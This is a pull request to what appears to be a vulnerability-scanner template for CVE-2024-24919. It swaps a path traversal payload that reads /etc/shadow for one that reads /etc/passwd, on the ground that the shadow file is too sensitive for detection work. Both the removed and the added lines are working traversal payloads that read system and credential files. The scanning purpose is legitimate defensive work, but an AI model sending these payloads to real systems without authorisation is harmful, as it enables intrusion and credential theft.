### PR TITLE
Update CVE-2024-24919.yaml - Accessing /etc/passwd may suffice for detection, but accessing the shadow file violates the ethical policies of most organizations

### DIFF
--- a/http/cves/2024/CVE-2024-24919.yaml
+++ b/http/cves/2024/CVE-2024-24919.yaml
@@ -28,7 +28,7 @@ http:
         Host: {{Hostname}}
         Accept-Encoding: gzip
 
-        aCSHELL/../../../../../../../etc/shadow
+        aCSHELL/../../../../../../../etc/passwd
 
     matchers-condition: and
     matchers:


### PR DESCRIPTION
### Template / PR Information :

Accessing `/etc/passwd` may suffice for detection, but accessing the `/etc/shadow` file may violates the ethical policies of most organizations

### Template Validation :

I've validated this template locally?
- [x] YES
- [ ] NO
